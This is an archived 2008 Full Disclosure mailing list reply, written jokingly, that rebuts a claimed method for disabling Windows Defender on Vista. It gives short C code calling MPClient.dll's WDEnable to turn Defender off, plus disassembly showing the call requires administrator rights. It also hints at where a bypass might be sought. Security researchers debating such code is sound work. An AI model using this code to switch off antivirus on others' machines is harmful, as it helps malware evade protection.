Full Disclosure mailing list archives
Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code
From: "Fredrick Diggle" <fdiggle () gmail com>
Date: Wed, 14 May 2008 23:10:42 -0500
HAHAHA Fredrick Diggle thinks that skyout was running his el8 assembly machine program in a debugger running as administrator :( oops... for the kids to test at home fred diggle has written an easier program which isn't as el8 (fred doesn't know the computer assembly language as he is a lowly zoo worker) but also isn't as dumb

#include <windows.h>

#define INFINITY_PLUS_1 0 // important DO NOT CHANGE

/* by defining the diggle license agreement secret sauce you are agreeing
   that fredrick diggle is far better than you will ever be and also that
   you will give him all your money please */
#ifdef DIGGLE_LICENSE_AGREEMENT
typedef int (WINAPI *diggle)(BOOL hippo);   /* prototype assumed for MPClient!WDEnable */
#endif

int main()
{
    HMODULE dlliggle;
    diggle WDEnable;

    /* LoadLibraryW: the path is a wide-string literal, so call the W variant
       explicitly instead of relying on UNICODE being defined */
    dlliggle = LoadLibraryW(L"C:\\Program Files\\Windows Defender\\MPClient.dll");
    if (dlliggle == NULL)
        return 1;

    WDEnable = (diggle) GetProcAddress(dlliggle, "WDEnable");
    if (WDEnable == NULL)
        return 1;

    WDEnable((BOOL)INFINITY_PLUS_1);        /* FALSE -> ask Defender to switch itself off */
    return INFINITY_PLUS_1;                 // <- THIS IS CRITICAL
}

doesn't work if fred is not admin :( <- sad face

Why could this be when skyout says it will?!?!?!?!

from MPClient.dll WDEnable() ...

.text:30C12858 loc_30C12858:                         ; CODE XREF: WDEnable(x)+16Ej
.text:30C12858     call    _MpFeatureDisable@8       ; This is teh call that Matters ++++++
...

MpFeatureDisable() ...

.text:30C0C8A9     lea     eax, [ebp+var_4]
.text:30C0C8AC     push    eax                        ; int
.text:30C0C8AD     push    ebx                        ; int
.text:30C0C8AE     call    _IsAdminOrSystem@8         ; IsAdminOrSystem(x,x)

Oops :((((((((

... so Fredrick thought in Fred's mind, well gee golly this checks if fred is an admin but I can control this code eh (disclaimer: fred is not canadian)... so what happens if fred makes this code do "mov DWORD PTR SS:[EBP-4], 1" instead of that nasty admin checking? well fred discovered that it basically calls into NdrClientCall2() which can be viewed for pleasure here -> http://msdn.microsoft.com/en-us/library/aa374215(VS.85).aspx see ----v

ClientMpDisableFeature() ...

.text:30C14FBA     lea     eax, [ebp+arg_0]
.text:30C14FBD     push    eax
.text:30C14FBE     push    offset byte_30C01AFE       ; pFormat
.text:30C14FC3     push    offset pStubDescriptor     ; pStubDescriptor
.text:30C14FC8     call    _NdrClientCall2            <- HELLo you devilish monkey
...

and although fred did not reverse this nastiness today he assures skyout that

1) MPClient.dll checks for admin privs (not that it matters)
2) even if it didn't this call wouldn't let you turn off defender without admin privs, if you want to find a way start ^--- there
3) his children will be plentiful with full heads of hair (but one might potentially be a midget... :D)

Fred diggle must go see if the hippo brushed his teeth before going to bed now good bye friends!

On Wed, May 14, 2008 at 3:49 PM, Peter Ferrie <peter.ferrie () gmail com> wrote:
> > my friend Izee from the EOF-Project(.net) team has coded a simple PoC code, that demonstrates how to disable the Windows Defender on Vista (tested with and without SPs on x86/x64) using its own API made for it.
>
> Does he realise that he must be Admin first? Then he can just disable the service, or delete the files, or whatever. Using the API doesn't gain much here.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/